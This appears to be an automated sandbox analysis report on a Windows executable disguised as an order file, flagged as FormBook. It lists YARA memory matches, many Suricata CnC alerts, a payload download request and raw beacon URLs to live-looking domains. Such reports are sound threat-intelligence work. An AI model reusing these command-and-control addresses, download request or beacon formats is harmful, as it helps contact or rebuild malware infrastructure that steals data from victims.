Windows Analysis Report
IMG_00991ORDER_FILES.exe

Suricata IDS alerts for network traffic

Source: Yara match	File source: 00000006.00000002.10861332855.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.10261487014.0000000004820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.10261406795.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.6863945298.0000000034E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.10861889744.0000000002410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.6864836258.00000000354F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: IMG_00991ORDER_FILES.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: IMG_00991ORDER_FILES.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.0000000000649000.00000020.00000001.01000000.0000000D.sdmp
Source:	Binary string: wntdll.pdbUGP source: IMG_00991ORDER_FILES.exe, 00000003.00000003.6754952143.0000000034FF4000.00000004.00000020.00020000.00000000.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000003.6751963994.0000000034E4A000.00000004.00000020.00020000.00000000.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: IMG_00991ORDER_FILES.exe, IMG_00991ORDER_FILES.exe, 00000003.00000003.6754952143.0000000034FF4000.00000004.00000020.00020000.00000000.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000003.6751963994.0000000034E4A000.00000004.00000020.00020000.00000000.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe
Source:	Binary string: mshtml.pdbUGP source: IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.0000000000649000.00000020.00000001.01000000.0000000D.sdmp

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 0_2_00405C60 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		0_2_00405C60
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 0_2_004068B1 FindFirstFileW,FindClose,		0_2_004068B1

Source: C:\Windows\SysWOW64\Robocopy.exe

Code function: 4x nop then mov ebx, 00000004h

5_2_04D104DE

Networking

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49812 -> 203.161.42.73:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49811 -> 76.223.67.189:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49811 -> 76.223.67.189:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49807 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49807 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49824 -> 35.244.245.121:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49810 -> 76.223.67.189:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49813 -> 203.161.42.73:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49809 -> 76.223.67.189:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49815 -> 203.161.42.73:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49815 -> 203.161.42.73:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49837 -> 172.96.191.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49820 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49830 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49814 -> 203.161.42.73:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49818 -> 38.47.207.120:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49826 -> 35.244.245.121:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49822 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49808 -> 76.223.67.189:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49817 -> 38.47.207.120:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49825 -> 35.244.245.121:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49838 -> 172.96.191.39:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49819 -> 38.47.207.120:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49819 -> 38.47.207.120:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49831 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49831 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49821 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49828 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49832 -> 3.82.56.39:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49823 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49823 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49816 -> 38.47.207.120:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49841 -> 148.135.49.178:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49840 -> 148.135.49.178:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49827 -> 35.244.245.121:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49827 -> 35.244.245.121:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49836 -> 172.96.191.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49829 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49842 -> 148.135.49.178:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49843 -> 148.135.49.178:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49850 -> 199.59.243.226:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49843 -> 148.135.49.178:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49855 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49855 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49846 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49833 -> 3.82.56.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49852 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49834 -> 3.82.56.39:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49871 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49835 -> 3.82.56.39:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49871 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49835 -> 3.82.56.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49860 -> 203.161.42.73:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49844 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49872 -> 35.244.245.121:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49873 -> 35.244.245.121:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49845 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49854 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49878 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49859 -> 76.223.67.189:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49847 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49859 -> 76.223.67.189:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49847 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49839 -> 172.96.191.39:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49839 -> 172.96.191.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49848 -> 199.59.243.226:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49861 -> 203.161.42.73:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49849 -> 199.59.243.226:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49856 -> 76.223.67.189:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49863 -> 203.161.42.73:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49863 -> 203.161.42.73:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49851 -> 199.59.243.226:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49851 -> 199.59.243.226:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49853 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49864 -> 38.47.207.120:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49857 -> 76.223.67.189:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49865 -> 38.47.207.120:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49866 -> 38.47.207.120:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49869 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49867 -> 38.47.207.120:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49858 -> 76.223.67.189:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49867 -> 38.47.207.120:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49879 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49879 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49874 -> 35.244.245.121:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49862 -> 203.161.42.73:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49877 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49876 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49868 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49870 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49875 -> 35.244.245.121:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49875 -> 35.244.245.121:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.tmglift.xyz

Source: Joe Sandbox View	IP Address: 76.223.67.189 76.223.67.189
Source: Joe Sandbox View	IP Address: 199.59.243.226 199.59.243.226

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: BODIS-NJUS BODIS-NJUS
Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View	ASN Name: CIZGITR CIZGITR

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49806 -> 23.111.141.202:80

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /wRdZDseACWW137.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.kapiextra.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /y2fc/?AvLLLbOh=5ZJwW+6cR+ukQX5L66hOVx0TNjHyeT2hZgA90YyTgMK9x7yRXodN7xJ1LlWJY5c/jX+OBDC/YU0F38ZFJDu2iru/QAMqsMv9PfcDIAk5SRBflopttme4W2g=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.23ddv.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /7arp/?AvLLLbOh=dfy87afTC55YVvzS7S1jwLgcbi5w3JHzjavaxDQa19dB03jQskYCA8r/7anBB+vouT+V5ax+XjGkuRHs6us4BcBFQfXKdzJ7j1Tj8ZGM7Jn4YelEF6F15fQ=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.gyver.cloudConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /evtw/?AvLLLbOh=qMLUfIVxcy5BUPOFUVVokgWijQnF2zXXVKt01YDq7Fx24AU1CDxJrzkqkKWLAIZ/xY36wLggT1PRMlR6dRNA0wLKv5lzUDW7qQMZ0amG/MTffFaAFzA5nlM=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.vlyra.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /7te8/?AvLLLbOh=jDN4zPqbFf9yM+3zgc/bkSOt3FtgrIUvIR/YWyCTW7MfoJq2/oprJylb09/bpIujsG26CmWa4QbZN3EYlCF2dF9UrXrnLyDZVZ+LwV0bzVblUs0ijF56Mzs=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.tyai36.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /1fqp/?7RB=66nPyLG8&AvLLLbOh=6qQxmJ3Ttl5RniwiWug+Nxykd+6yd18sY/lOZ1tjFrv55oSFkvFWhSP7kPUWLsM6iDX/GYi1Ud/wPB7htSWHGJqJldTcfRVJgzvdZiQtfUg3P6HLle1MpkQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.indeks.spaceConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /x85c/?AvLLLbOh=Y3mIzDGxysayARzY45AnHIIy2B4pc2sd+rPTtixWlkJfFxNC1K7RiT+8e26JUdxdhynJ2ADdGNEqJqOO4cICPBs0jMW0AIUC/yJyUu4ejJJDyAbCIM7A/9A=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.kiristyle.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /fu44/?AvLLLbOh=MlL7Bon/74QoG2vpxD8T9dipagYbr0R/tXGKYkMRJkwHHENkeAO2oHPD98qp5zZW/5TdXnrAZisENNCTsRHdM0U4DZ3reu4ViZt4mxUl7os1vic25L7j48U=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.tmglift.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /q3za/?AvLLLbOh=RWnANPBTnIHygAxj+74p2fQt/r+QMu+ZbRPK+z1nLy5TPZ7mlunYNOVzlFQ68L6IsvBO8bEu8tkdQ9B+wYsoyn5BHOSzYZ2Hj+i3Yz8xBJ+jGbXNJ7HrFvE=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.theaji.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /frol/?AvLLLbOh=YNeTF4pSv4+M6gG3KqO7busQPotc22z/OB6yhtk01jUCobC9Y52Gmw3Z99Ir4kEoVNEa+n0iDPzrnsm9kM3Fz3qyLYlg0011pg2PCcWBraIo86SjG5d0+YE=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.bola88site.oneConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /w4ze/?7RB=66nPyLG8&AvLLLbOh=d0Jtowaj2cDKdGl/ZWixKoK2UJz0xOtSqBjDY2hG4a3QahhJ7y0n5KAnu51LUWnaBzfk1RzCzkwasvfXjgFxQ6WD3nD/I11dyUYYEHS/n2QZzV395iZlwCs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.policydetails.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /euco/?AvLLLbOh=GPABfGdOLFG14n4QgnBiZ+BsyIvrzjVDDLyvQv6auzHiN3b/aWsmGL4J/M+2YRVr/47k2ZlpprwluvqtoYpidrJVs8sq2aKxZBcIKy6V2Ahz0rKVLGXmBGY=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.at8l4.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /i0bg/?AvLLLbOh=bQKVVFfanjNZBfdcIZop/p51Kq/q4DLd8P4GjEmXCojBwWm3h7h09nlNydz6D8la1AjIsgIaNvk5Cs0Spg0Y+chR33DfPPxX8Qm8eqAyl/PDJccbAQNQv5M=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.dom-2.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
